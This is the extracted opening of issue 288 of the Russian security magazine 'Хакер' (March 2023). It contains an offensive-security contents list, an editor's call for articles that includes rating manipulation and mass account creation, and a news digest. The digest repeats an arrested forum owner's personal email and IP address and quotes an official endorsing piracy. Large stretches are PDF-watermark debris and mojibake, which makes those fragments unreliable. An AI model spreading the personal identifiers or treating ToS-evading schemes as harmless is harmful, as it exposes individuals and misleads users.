книги хакеры / журнал хакер / ха-288_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
|||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
m |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
n |
e |
|
март 2023 |
|
df |
|
n |
e |
|
|||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
№ 288 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
CONTENTS |
|
|
|
|
|
|
|
|
|
|
|
7 вечных тем |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
Колон ка главреда |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
MEGANews |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
Самые |
|
важные |
события в мире инфосека |
за март |
|
|
|
|
|
|||||||||||||||||||||||||||
Неправильные эльфы |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||
Учим исполняе мые файлы |
Linux сопротив |
л яться |
отладке |
|
|
|
|
|||||||||||||||||||||||||||||
Опасный модем |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
Закрепля |
емс |
я в атакован |
ной |
системе |
при помощи USB-модема |
|
|
|||||||||||||||||||||||||||||
Фундаментальные основы хакерства |
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||
Исполь |
зуем |
отладчик для анализа |
64-разрядных |
программ |
в Windows |
|
||||||||||||||||||||||||||||||
DOM XSS через Web Messaging |
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
Как работае т легкий |
способ |
получить XSS с помощью postMessage |
|
|
||||||||||||||||||||||||||||||||
Поставщик небезопасности |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||
Как Windows раскры |
вает |
пароль пользовате |
ля |
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||
Девайс-невидимка |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
Встраива |
емся |
в локальну |
ю сеть с помощью «невидимого |
» хакерско |
го |
устройства |
||||||||||||||||||||||||||||||
Ангард! |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
Ревер |
си м приложе |
ние |
, защищенно |
е DNGuard |
|
|
|
|
|
|
|
|
||||||||||||||||||||||||
Уроки форензики |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
Ищем улики |
в сетевом траф |
ике |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||
HTB Mentor |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
Извле |
каем |
информаци |
ю из SNMP и пентестим |
API веб сервиса |
|
|
||||||||||||||||||||||||||||||
HTB Vessel |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
Эксплу |
ати |
р уем уязвимос |
ть в кластере |
Kubernetes |
|
|
|
|
|
|||||||||||||||||||||||||||
HTB Extension |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
Пентестим |
плагин |
для Gitea и сбегаем |
из Docker |
|
|
|
|
|
|
|||||||||||||||||||||||||||
HTB Forgot |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
Отравля |
е м Web Cache для получени я админки сайта |
|
|
|
|
|||||||||||||||||||||||||||||||
Состязание в приватности |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||
Сравнива |
ем |
безопасные |
|
браузе |
ры |
2023 года |
|
|
|
|
|
|
|
|
||||||||||||||||||||||
Чит своими руками |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
Смотрим |
|
сквозь стены |
и делае м автоприцел |
ивание |
для 3D-шутера |
|
|
|||||||||||||||||||||||||||||
Титры |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
Кто делает |
этот журна л |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
ПОДПИСКА НА «ХАКЕР»
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Мы благодарим всех, кто поддерживает редакцию и помогает нам компенсировать авторам и редакторам их труд. Без вас «Хакер» не мог бы существовать, и каждый новый подписчик делает его чуть лучше.
Напоминаем, что дает годовая подписка:
год доступа ко всем материалам, уже опубликованным на Xakep.ru;
год доступа к новым статьям, которые выходят по будням;
полное отсутствие рекламы на сайте (при условии, что ты залогинишься); возможность скачивать выходящие
каждый месяц номера в PDF, чтобы читать на любом удобном устройстве;
личную скидку 20%, которую можно использовать для продления
годовой подписки. Скидка накапливается с каждым продлением.
Если по каким-то причинам у тебя еще нет подписки или она скоро кончится, спеши исправить это!
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
||||
|
wClick |
|
BUY |
o m |
HEADER |
||||
|
to |
|
|
|
|||||
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
||
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
c |
n |
e |
|
|||
|
|
|
-x ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
c |
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
КОЛОНКА ГЛАВРЕДА
Если ты читаешь «Хакер» регулярно, то наверняка уже встречал многочисленные призывы редакции написать нам статью. Ведь большую часть наших материалов пишут не какие-то специально обученные люди, а простые айтишники, хакеры и безопасники. Редакторы же только помогают довести текст до ума и немножко олитературить. И вот у меня возникла новая идея, как мотивировать потенциальных авторов: рассказать, какие статьи нам нужны в первую очередь.
Андрей Письменный
Главный редактор apismenny@gmail.com
Существуют темы, о которых «Хакер» мог бы писать бесконечно и для которых постоянно не хватает рук. Давай пройдемся по ним и ты подумаешь, не готов ли взяться за что-то из этого. Если вдруг появится идея — открывай почтовик
ишли письмо на pismenny@glc.ru, а если предпочитаешь «Телеграм», то на @apismenny. Ответ гарантирован, хоть и не моментальный!
Напоминаю, что наши авторы получают за работу гонорары, помимо того, что читают «Хакер» бесплатно. Суммы варьируются в зависимости от темы
исложности материала.
ТЕМА 1. УТИЛИТЫ ДЛЯ ВЗЛОМА
Постоянные читатели наверняка помнят рубрику X-Tools, где мы делали обзоры новых хакерских утилит. В какой-то момент кончились не то утилиты, не то авторы этой рубрики, и в итоге она куда-то запропастилась. Возрождать ее мы не планируем, но сами руководства по хактулзам нужны как никогда — причем как по новым, так и по старым, хорошо известным. Со временем меняется и набор функций, и контекст, и многое другое. Вещь, о которой нужно помнить, берясь за такой текст: он не должен быть переводом справки к утилите. Гораздо интереснее показать тулзу в деле и рассказать о разных случаях, в которых она может пригодиться.
ТЕМА 2. ТРЮКИ, АВТОМАТИЗАЦИЯ И DIY
Каждый уважающий себя гик и тем более сисадмин или безопасник непрерывно улучшает свой рабочий процесс. В ход идут разные средства автоматизации и тонкой настройки операционной системы. Мы бы хотели время от времени публиковать статьи, которые расскажут читателям о разных неочевидных ходах и полезных программах. Сюда же относится и всякое самоделие: если ты смастерил космический корабль из кофеварки и старого смартфона, из этого наверняка выйдет забойное чтиво!
ТЕМА 3. СРАВНЕНИЕ СРЕДСТВ ЗАЩИТЫ
По сути, это обыкновенные тесты софта, но не любого, а для обеспечения безопасности — как личной, так и корпоративной. От десктопных антивирусов и файрволов до SIEM. Программы обязательно нужно пробовать самостоятельно, по возможности в условиях, приближенных к боевым. В качестве хорошего примера можно посмотреть наш цикл статей про бесплатные антивирусы.
ТЕМА 4. АНАЛИЗ ПРИВАТНОСТИ ПОПУЛЯРНОГО СОФТА
Разработчики программ часто наделяют свои творения незаметными функциями, которые не только не помогают пользователю, но и вредят ему, отправляя личные данные на какой-нибудь левый сервер. Кто-то должен обнаруживать эту активность и сообщать о ней. Взяв в руки TCPView или Wireshark, ты можешь стать тем самым героем, который выведет злодеев на чистую воду. В качестве примера можешь глянуть статью о том, как Windows 10 не отлипает от серверов Microsoft. Проверять, кстати, можно не только софт, но и любые умные устройства, до которых получится дотянуться.
ТЕМА 5. УЯЗВИМОСТИ И ТЕХНИКИ ВЗЛОМА С НУЛЯ
За все время существования «Хакера» мы неоднократно и на разные лады объясняли все основные техники атак. Но, как и в случае с утилитами, контекст постоянно меняется, и толковые, подробные и новые описания даже самых базовых вещей вроде подбора пароля или SQL-инъекций будут полезны новым читателям. Как сделать толково? Показывать всё на практике, давать примеры из реальных кейсов, не жалеть ссылок на дополнительные материалы.
ТЕМА 6. КОДИНГ
В рубрику «Кодинг» сейчас нужно несколько форматов. Первый — циклы в духе наших статей «Python с нуля», но по другим языкам. В первую очередь — Java, JavaScript и Go. Это материалы для абсолютнейших новичков. Второй нужный формат — техники написания хактулз: скреперов, снифферов, фаззеров и прочей хакерской веселухи. Третий — «кодинг для профи»: профессиональные советы о том, как писать оптимальный, более защищенный и легко поддерживаемый код на одном из популярных языков.
ТЕМА 7. ЗАРАБОТОК В ИНТЕРНЕТЕ
Множество людей зарабатывает деньги изощренными способами, которые, с одной стороны, не найдешь в классификаторе профессий, с другой — не относятся к криминалу и в худшем случае нарушают какое-нибудь пользовательское соглашение. Сбор данных с сайтов, которые от этого защищены, накрутка рейтингов, массовое создание аккаунтов и прочее в таком духе, а также предоставление сопутствующих товаров и услуг. Обо всем этом можно интересно рассказать, имея личный опыт или достаточно знакомств в этой области. Интересны как практические статьи, так и рассказы об индустрии: что сколько стоит, где продается, какие есть неочевидные моменты.
НАПУТСТВИЕ
Обычно человек, читавший «Хакер», уже неплохо представляет себе, как выглядят наши статьи. Но на всякий случай напомню: мы стараемся писать живым языком, без зауми; общаемся с читателем на ты и используем те слова, которыми обсуждали бы те же темы между собой. Юмор и хорошее настроение всегда приветствуются!
Но не буду повторяться — советы о том, как писать, я уже давал в одном из прошлых выпусков колонки. Читай, вдохновляйся и дай знать мне или кому-то из редакторов, когда придумаешь подходящую тему.
|
|
|
|
hang |
e |
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
Мария «Mifrill» Нефёдова nefedova@glc.ru
В этом месяце: представлен дистрибутив Kali Purple, ученые и эксперты призывают приостановить обучение ИИ, правоохранители арестовали создателя BreachForums, дроны DJI раскрывают местоположение своих операторов, Twitter ищет человека, который слил исходные коды компании на GitHub, в TPM 2.0 выявлены опасные уязвимости, а также другие интересные события марта.
KALI PURPLE
ДЛЯ БЕЗОПАСНИКОВ
Компания O ensive Security выпустила Kali Linux 2023.1, первую в 2023 году версию (к тому же приуроченную к десятилетию проекта), с новым дистрибутивом Kali Purple, который предназначен для blue и purple team, то есть ориентирован на оборонительную безопасность.
««За прошедшие годы мы усовершенствовали то, на чем специали зировались, то есть наступательную безопасность. Теперь мы
начинаем переход в новую область — оборонительную безопас ность, — пишут в Offensive Security. — Мы делаем предстартовый запуск ознакомительной технической версии Kali Purple. [Дистрибутив] пока находится на начальном этапе развития, и ему потребуется вре
мя, чтобы созреть. Но вы уже можете видеть направление, в котором развивается Kali, а также можете принять участие в формировании » этого направления!»
Хотя дистрибутив еще на ранних стадиях разработки, он уже включает в себя более 100 защитных инструментов, в том числе Malcolm, Suricata, Arkime, TheHive и Zeek, а также имеет специальную Wiki, которая поможет начать работу.
Kali Purple уже можно загрузить в виде ISO-образа для систем x64/AMD64. Кроме того, стоит отметить, что в состав Kali 2023.1 вошли сразу восемь
новых инструментов:
•Arkime — инструмент для захвата и поиска пакетов с открытым исходным кодом;
•CyberChef — настоящий «мультитул», позволяющий анализировать, расшифровывать, деобфуцировать и декодировать данные с помощью самых разных инструментов;
•DefectDojo — опенсорсный инструмент для корреляции и оркестровки безопасности и управления уязвимостями приложений;
•Dscan — wrapper для Nmap для распределенного сбора сетевых данных;
•Kubernetes-Helm — платформа управления пакетами Kubernetes с открытым исходным кодом;
•PACK2 — комплект для анализа и взлома паролей;
•Redeye — инструмент, призванный помочь наиболее эффективно и организованно управлять своими данными во время пентеста;
•Unicrypto — единый интерфейс для ряда криптоалгоритмов.
42% КОМПАНИЙ НЕ ХВАТАЕТ ИБ-СПЕЦИАЛИСТОВ
По данным «Лаборатории Касперского», более трети компаний в России (42%) вынуждены обращаться к поставщикам управляемых IT- и ИБ-услуг (MSP/MSSP) из-за нехватки собственных специалистов.
Аналогичное же число респондентов (по 42%) указали две другие причины работы с компаниями в сфере ИБ на аутсорсе: более высокая эффективность и необходимость следовать требованиям регуляторов.
Около трети опрошенных отметили недостаток опыта в сфере кибербезопасности внутри своей организации (36%) и финансовую выгоду, связанную с оптимизацией затрат на поддержку штата, покупку лицензий, разворачивание и масштабирование IT-инфраструктуры (32%).
СОЗДАТЕЛЬ
BREACHFORUMS
АРЕСТОВАН
В конце марта стало известно об аресте живущего в Нью-Йорке владельца и основателя хакерского форума BreachForums (известен в сети как Pompompurin).
В последнее время BreachForums был крупнейшим хак-форумом, посвященным утечкам данных, и обычно именно он использовался взломщиками и вымогателями для слива информации. Ресурс был запущен Pompompurin’ом в прошлом году, после того как ФБР закрыло хакерский сайт
RaidForums.
Лично Pompompurin и другие участники BreachForums связаны со множес- твом громких взломов и утечек данных, включая кражу данных миллионов пользователей Robinhood, утечку данные 5,4 миллиона пользователей Twitter, недавние атаки на Acer и Activision.
По данным министерства юстиции, до отключения на BreachForums насчитывалось более 340 тысяч пользователей. По состоянию на 11 января 2023 года в БД платформы было 888 наборов данных, состоящих более чем из 14 миллиардов отдельных записей.
Вскоре после ареста основателя ресурса оставшийся администратор, известный под ником Baphomet, был вынужден закрыть сайт окончательно, так как обнаружил, что продолжать работу небезопасно, ведь к инфраструктуре BreachForums, похоже, уже получили доступ правоохранители.
Дело в том, что, когда инфраструктура BreachForums была отключена, в сети остался старый CDN-сервер, на котором размещались не слишком важные данные.
««Во время миграции я проверял, не происходит ли чего то подоз рительного, что могло бы вызывать беспокойство, — писал
Baphomet. — Одним из проверенных мной серверов был наш старый
сервер CDN, упомянутый выше. Похоже, кто то входил |
â |
ñèñ |
|
тему 19 марта, в 1:34 EST, до того, как на сервер вошел я. |
|
|
|
К сожалению, |
это приводит нас к выводу, что, скорее |
всего, |
|
ó êîãî òî åñòü |
доступ к машине Pom’a. Наши серверы |
никогда |
не используются кем то еще, поэтому кто то должен был знать учет ные данные, чтобы иметь возможность войти в систему.
Теперь я чувствую, что оказался в ситуации, когда нельзя считать, что хоть что то находится в безопасности, будь то наши конфигура
ции, исходный код или информация о наших пользователях — список » бесконечен».
Как в итоге сообщили американские власти, 20-летнему Коннору Брайану Фитцпатрику (Conor Brian FitzPatric), также известному как Pompompurin,
предъявлены обвинения, связанные с хищением и продажей конфиденциальной личной информации, принадлежащей «миллионам граждан США, а также сотням американских и иностранных компаний, организаций и государственных учреждений». Фитцпатрик обвиняется в сговоре с целью совершения мошенничества с устройствами доступа, и в случае признания виновным ему грозит до пяти лет тюремного заключения.
Внастоящее время Фитцпатрик уже предстал перед судом и был отпущен под залог в размере 300 тысяч долларов.
Всудебных документах специальный агент ФБР Джон Лонгмайр (John Longmire) рассказывает, что ФБР получило доступ к БД BreachForums и это помогло установить, что Фитцпатрик действительно Pompompurin.
Правоохранители пришли к таким выводам на основании журналов активности и данных интернет-провайдера обвиняемого, Optimum Online (учетная запись зарегистрирована на адрес conor tz@optimum.net), а также данных, полученных от компаний Verizon, Google и Apple.
Связать Фитцпатрика с личностью основателя BreachForums помог частный разговор, в ходе которого Фитцпатрик сообщил владельцу ныне закрытого RaidForums, что украденная база данных ai.type, попавшая на Have I Been Pwned, не содержит его старый почтовый адрес conor tzpatrick02@gmail.com. Доступ к этому чату правоохранители получили после ликвидации RaidForums и конфискации серверов.
Лонгмайр пишет, что, помимо этого, ФБР выявило IP-адрес Фитцпатрика
в Optimum Online (69.115.201.194), попавший в базу BreachForums, так как однажды он использовал его для входа на хак-форум, судя по всему забыв использовать Tor или включить VPN (также вероятно, что VPN-сервис допустил сбой). Этот же IP был связан с личным аккаунтом iCloud Фитцпатрика.
Кроме того, данные Verizon показали, что IP-адреса, ранее использованные для доступа к учетной записи Pompompurin на RaidForums, были привязаны к мобильным устройствам, зарегистрированным на Фитцпатрика, который проживает в доме своего отца в городе Пикскилле.
В ходе ареста сам обвиняемый открыто признался правоохранительным органам (без присутствия адвоката), что именно он скрывается за псев-
донимом Pompompurin на BreachForums.
««Он также признал, что владеет BreachForums и управляет им, а ранее управлял учетной записью Pompompurin на RaidForums. По его оцен
кам, он зарабатывал около 1000 долларов в день на BreachForums
и использовал эти деньги для администрирования ресурса и покупки » других доменов», — гласят документы.
ИИПОВЛИЯЕТ НА РЫНОК ТРУДА
Исследователи из Goldman Sachs подготовили специальный отчет, посвященный тому, как ИИ-системы могут повлиять на рынок труда в США и Европе. По их мнению, появление генеративного ИИ может так или иначе затронуть до 300 000 000 рабочих мест. Однако большинство отраслей и профессий будут только частично подвержены автоматизации и скорее будут дополнены, а не заменены искусственным интеллектом.
Примерно 2/3 всех рабочих мест может затронуть автоматизация с использованием ИИ, который снимет до 50% нагрузки с работников.
Ожидается, что лишь 7% трудящихся могут потерять свою должность и могут быть заменены ИИ. Еще в 63% случав ИИ возьмет на себя лишь часть задач, облегчив работу людям, а примерно 30% работающих людей развитие ИИ-систем вообще не затронет.
Около 25% всех рабочих задач, выполняемых в США и Европе, могут быть автоматизированы с помощью искусственного интеллекта.
В США наибольшей угрозе «вытеснения» с рынка труда подвержены офисные и административ-
ные работники (46%), юристы (44%), а также специалисты в области архитектуры и проектирования (37%).
Наименьшей угрозе со стороны ИИ подвергаются специалисты по уборке и обслуживанию, а также ремонту и строительству.
Если широко использовать искусственный интеллект, то общий рост мирового ВВП может составить 7% в течение следующих десяти лет, считают эксперты.
SYNACKTIV
ПОБЕДИЛА НА PWN2OWN
На конференции CanSecWest завершилось хакерское соревнование Pwn2Own. В этом году специалисты суммарно раскрыли 27 уникальных 0-day- уязвимостей, скомпрометировав в числе прочего Tesla Model 3, Windows 11, macOS и Ubuntu, и забрали с собой 1 035 000 долларов и новую Tesla Model 3.
Бесспорным лидером соревнований стала французская команда Synacktiv, в состав которой в этом году вошли Элуа Бенуа-Вандербекен (Eloi Benoist-Vanderbeken), Давид Берар (David Berard), Винсент Деор (Vincent Dehors), Танги Дуброка (Tanguy Dubroca), Тома Бузерар (Thomas Bouzerar) и Тома Имбер (Thomas Imbert).
На счету специалистов следующие успешные взломы и призы:
•250 000 долларов: цепочка эксплоитов, направленная на переполнение хипа и запись в OOB, позволяющая получить свободный root через инфотеймент-систему Tesla Model 3;
•100 000 долларов: атака типа TOCTOU (time of check to time of use)
на Tesla Model 3;
•80 000 долларов: цепочка из трех ошибок, направленная на повышение привилегий на хосте Oracle VirtualBox;
•40 000 долларов: TOCTOU-атака на повышение привилегий в Apple macOS;
•30 000 долларов: повышение привилегий в Ubuntu Desktop;
•30 000 долларов: атака на UAF в Microsoft Windows 11.
Суммарно команда увезла домой 530 тысяч долларов (это примерно половина всего призового фонда соревнований), Tesla Model 3 и заработала 53 балла Master of Pwn, обогнав всех соперников с огромным отрывом.
Это уже второй раз, когда Synacktiv выигрывает Pwn2Own. В прошлый раз специалисты Synacktiv заняли первое место в 2021 году, на Pwn2Own Austin.
Теперь все поставщики должны исправить продемонстрированные и раскрытые во время Pwn2Own уязвимости в течение 90 дней, а затем Trend Micro Zero Day Initiative открыто опубликует технические подробности всех использованных на соревновании 0-day-эксплоитов.
МЕДВЕДЕВ ПОДДЕРЖАЛ ПИРАТСТВО
Зампред Совбеза РФ Дмитрий Медведев заявил, что считает правильным скачивать и распространять в сети пиратские копии фильмов и музыкальных произведений, которые стали недоступны в России по решению западных правообладателей.
→ «Знаете что? Ищите правильных пиратов и скачивайте у них. Если они ушли от нас, всякие „Нетфликсы“ и прочие, значит, будем это все скачивать, будем пользоваться бесплатно. А я бы все это по сети разбрасывал, для того чтобы причинить им максимальный урон. Максимальный урон, чтобы они обанкротились!»
— заявил Медведев в интервью российским СМИ, комментируя исчезновение, в частности, некоторой западной музыки из онлайн-сервисов в РФ.
Также он отметил, что раньше отрицательно относился к пиратству, как юрист, «и считал, что лучше переплатить», даже когда ему говорили, что «все есть на торрент-трекерах».
ЗАДЕРЖИТЕ ИИ!
Более тысячи человек, в число которых вошли профессора и ИИ-разработ- чики, подписали открытое письмо, обращенное ко всем лабораториям, занимающимся разработкой искусственного интеллекта. В послании, опубликованном некоммерческой организацией Future of Life, эксперты призывают немедленно приостановить разработку и обучение ИИ, более мощных, чем GPT-4, хотя бы на полгода.
Письмо подписали многие известные люди, которые занимаются разработкой и технологиями в сфере ИИ, в том числе: соучредитель OpenAI Илон Маск, математик, кибернетик и информатик, наиболее известный работами в области искусственного интеллекта, а также основатель Mila Йошуа Бенджио, соучредитель Apple Стив Возняк, глава Stability AI Эмад Мострак, пионер исследований в области ИИ Стюарт Рассел, а также основатель
Geometric Intelligence Гэри Маркус.
Воткрытом письме упоминаются потенциальные риски для общества
ичеловечества, возникающие в результате быстрого развития передовых ИИ-систем в отсутствие общих протоколов безопасности. Подписавшиеся считают, что потенциальные риски этой «революции» еще только предстоит всецело оценить и учесть с помощью комплексной системы управления, тогда как положительный эффект от этих технологий не гарантирован.
««Продвинутый ИИ может повлечь за собой значительные изменения в истории жизни на Земле, и его следует планировать и управлять им
с соответствующей осторожностью и ресурсами, — гласит пос лание. — К сожалению, такого планирования и управления не про исходит, невзирая на то, что в последние месяцы ИИ лаборатории
ввязались в неконтролируемую гонку по разработке и внедрению все более мощных цифровых разумов, которые никто (включая их соз » дателей) не может понять, предсказать или надежно контролировать».
Также письмо предупреждает, что современные ИИ-системы уже напрямую конкурируют с людьми в выполнении общих задач, что поднимает ряд экзистенциальных и этических вопросов, которые человечеству все еще необходимо рассмотреть, обсудить и решить.
